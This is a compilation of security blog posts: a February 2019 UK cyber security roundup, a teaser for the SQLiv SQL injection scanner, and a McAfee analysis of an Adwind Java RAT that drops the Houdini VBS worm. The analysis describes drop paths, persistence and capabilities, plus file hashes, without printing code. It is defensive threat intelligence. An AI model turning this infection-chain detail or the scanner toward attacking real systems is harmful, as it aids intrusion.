The contour of our digital life evolves and expands every day. And, unfortunately, along with that growth will come people who attempt to cause harm or plant fear just for sport. Rather than respond with fear, consider approaching risks with a fresh determination to equip your family with the knowledge and tools it needs to thrive and stay safe in this ever-changing digital terrain.

The post Alleged ‘Momo Challenge’ Reminds Parents to Monitor Online Content appeared first on McAfee Blogs.

Cyber Security Roundup for February 2019

The perceived threat posed by Huawei to the UK national infrastructure continued to make the headlines throughout February, as politicians, UK government agencies and the Chinese telecoms giant continued to play out their rather public spat in the media. See my post Is Huawei a Threat to UK National Security? for further details. And also, why DDoS might be the greater threat to 5G than Huawei supplied network devices.

February was a rather quiet month for hacks and data breaches in the UK, Mumsnet reported a minor data breach following a botched upgrade, and that was about it. The month was a busy one for security updates, with Microsoft, Adobe and Cisco all releasing high numbers of patches to fix various security vulnerabilities, including several released outside of their scheduled monthly patch release cycles.

A survey by PCI Pal concluded the consequences of a data breach had a greater impact in the UK than the United States, in that UK customers were more likely to abandon a company when let down by a data breach. The business reputational impact should always be taken into consideration when risk assessing security.


Another survey of interest was conducted by Nominet, who polled 408 Chief Information Security Officers (CISOs) at midsize and large organisations in the UK and the United States. A whopping 91% of the respondents admitted to experiencing high to moderate levels of stress, with 26% saying the stress had led to mental and physical health issues, and 17% said they had turned to alcohol. The contributing factors for this stress were job security, inadequate budget and resources, and a lack of support from the board and senior management. A CISO role can certainly can be a poisoned-chalice, so its really no surprise most CISOs don't stay put for long.

A Netscout Threat Landscape Report declared in the second half of 2018, cyber attacks against IoT devices and DDoS attacks had both rose dramatically. Fuelled by the compromise of high numbers of IoT devices, the number of DDoS attacks in the 100GBps to 200GBps range increased 169%, while those in the 200GBps to 300GBps range exploded 2,500%. The report concluded cybercriminals had built and used cheaper, easier-to-deploy and more persistent malware, and cyber gangs had implemented this higher level of efficiency by adopting the same principles used by legitimate businesses. These improvements has helped malicious actors greatly increase the number of medium-size DDoS attacks while infiltrating IoT devices even quicker.

In a rare speech, Jeremy Fleming, the head of GCHQ warned the internet could deteriorate into "an even less governed space" if the international community doesn't come together to establish a common set of principles. He said "China, Iran, Russia and North Korea" had broken international law through cyber attacks, and made the case for when "offensive cyber activities" were good, saying "their use must always meet the three tests of legality, necessity and proportionality. Their use, in particular to cause disruption or damage - must be in extremis".  Clearly international law wasn't developed with cyber space in mind, so it looks like GCGQ are attempting to raise awareness to remedy that.

I will be speaking at the e-crime Cyber Security Congress in London on 6th March 2019, on cloud security, new business metrics, future risks and priorities for 2019 and beyond.

Finally, completely out of the blue, I was informed by 4D that this blog had been picked by a team of their technical engineers and Directors as one of the best Cyber Security Blogs in the UK. The 6 Best Cyber Security Blogs - A Data Centre's Perspective Truly humbled and in great company to be on that list.

BLOG
NEWS 
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

    SQLiv – Massive SQL injection scanner

    SQLiv – Massive SQL injection scanner SQLiv Massive SQL injection scanner Features multiple domain scanning with SQL injection dork by Bing, Google, or Yahoo targetted scanning by providing specific domain (with crawling) reverse domain scanning both SQLi scanning and domain info checking are done in multiprocessing so the script is super fast at scanning many […]

    The post SQLiv – Massive SQL injection scanner appeared first on HackingVision.

    JAVA-VBS Joint Exercise Delivers RAT

    The Adwind remote administration tool (RAT) is a Java-based backdoor Trojan that targets various platforms supporting Java files. For an infection to occur, the user must typically execute the malware by double-clicking on the .jar file that usually arrives as an email attachment. Generally, infection begins if the user has the Java Runtime Environment installed. Once the malicious .jar file runs successfully on the target system, the malware silently installs itself and connects to a remote server through a preconfigured port. This allows it to receive commands from the remote attacker and perform further malicious activities. Recently, McAfee labs has seen a surge in a variant which comes as a JAR attachment via a spam email and uses the famous Houdini VBS worm to infect user.

    Infection chain:

    The malware’s spreading mechanism is the same as in previous versions. It arrives in a spam email with a .jar attachment. The contents of the email are carefully crafted to lure victims using social engineering techniques. We can summarise the whole infection chain as shown in the below snippet:

     

    The spam email may look like this:

    The parent JAR file:

    To keep things simple, we just called the attached .jar file as a parent jar file and named it Sample.jar. Generally, Adwind comes in an obfuscated form to hide its malicious intent. Its payload and configuration file (which serves as an installation file) are encrypted with the DES, RC4, or RC6 cipher, depending on the variant. The Adwind backdoor will decrypt itself on the fly during execution. In this variant we can see the contents of Manifest.MF. It has main class bogjbycqdq.Mawbkhvaype.

    Mawbkhvaype.class

    The main task of this class is to check for a resource file available in the Jar bundle. Here, resource mzesvhbami is a vbs file. Mawbkhvaye.class will check for mzesvhbami in the resource section and later drop bymqzbfsrg.vbs in the user’s Home directory before executing it with the help of wscript.

    Bymqzbfsrg.vbs

    It has a huge chunk of obfuscated base64 encoded data present. The below snippet shows the partial part of Bymqzbfsrg.vbs script.

    Once deobfuscated and decoded, the base64 encoded data converts to ntfsmgr.jar and is dropped in %appdata%/Roaming. The below snippet shows the conversion of base64 encoded data into Jar file:

    Decoded to JAR file (ntfsmgr.jar)

    Ntfsmgr.jar

    Here, important files present in ntfsmgr.jar are drop.box, mega.download and sky.drive which will be used later for creating the configuration file for the malware.

    Final Payload:

    Ntfsmgr.jar has operational.Jrat as the main class. The purpose of operational.Jrat is to drop another .jar file into the %TEMP% folder with random file name [underscore] [dot] [random numbers] [dot] class, e.g. _0.1234567897654265678.class, which will be the actual payload and later will perform malicious activities on the user’s system. The below snippet shows the routine present in operational.Jrat for creation of the final payload in %TEMP% location.

    The contents of Manifest.MF looks somewhat similar to ntfsmgr.jar. All the other files in the final Java archive will be decrypted on the fly and will infect the system. After Adwind successfully infects a system, we have seen it log keystrokes, modify and delete files, download and execute further malware, take screenshots, access the system’s camera, take control of the mouse and keyboard, update itself, and more. We are not going to dig into this threat in this direction now but you can read more about Adwind here and here. In this blog we will now discuss another part of the story, Bymqzbfsrg.vbs

    Working of Bymqzbfsrg.vbs

    After successful execution, Bymqzbfsrg.vbs drops ntfsmgr.jar and sKXoevtgAv.vbs in %appdata%/Roaming.

    Bymqzbfsrg.vbs dynamically executes a method naira inside the script by using ExecuteGlobal, as seen in the below snippet.:

    Dynamic execution of the script looks like this:

    The below snippet shows the script for dropping sKXoevtgAv.vbs in %appdata%Roaming.

    Here we see the script for dropping ntfsmgr in %appdata%Roaming.

    At the time of execution, sKXoevtgAv.vbs decodes itself to Houdini vbs worm which is the final payload. The first few lines of the script are as follows:

    The attacker may perform many malicious activities on the victim’s machine, including::

    • Downloading and executing files on the victim’s machine
    • Running command instructions
    • Updating or uninstalling a copy of itself
    • Downloading and uploading files
    • Deleting a file or folder
    • Terminating certain process

    Enumerating files and folders on the victim’s machine

    Additional Points:

    1. For persistence it creates a run entry.

    When the ntfsmgtr.jar runs, it adds itself into the start-up so that it will be run whenever the system starts.

    1. It checks for installed anti-malware products on the system.

    1. If available, it copies the installed Java Runtime files to a temporary directory within the victim’s home directory, otherwise it downloads from the web and copies in the same directory.

    Conclusion:

    In past, we have seen threat actors using two similar functioning malware families in a single infection. Usually, threat actors chose this path for higher probability of successful infection.

    The hashes used in the analysis:

    Sample.jar: 07cb6297b47c007aab43311fcfa9976158b4149961911f42d96783afc517226a

    Ntfsmgr.jar: ee868807a4261a418e02b0fb1de7ee7a8900acfb66855ce46628eb5ab9b1d029

    McAfee advises users to keep their antimalware signatures up to date at all times. McAfee products detect the malicious jar files as Adwind-FDVH.jar! [Partial hash] and Adwind-FDVJ.jar! [Partial Hash], with DAT Versions 9137 and later.

    The post JAVA-VBS Joint Exercise Delivers RAT appeared first on McAfee Blogs.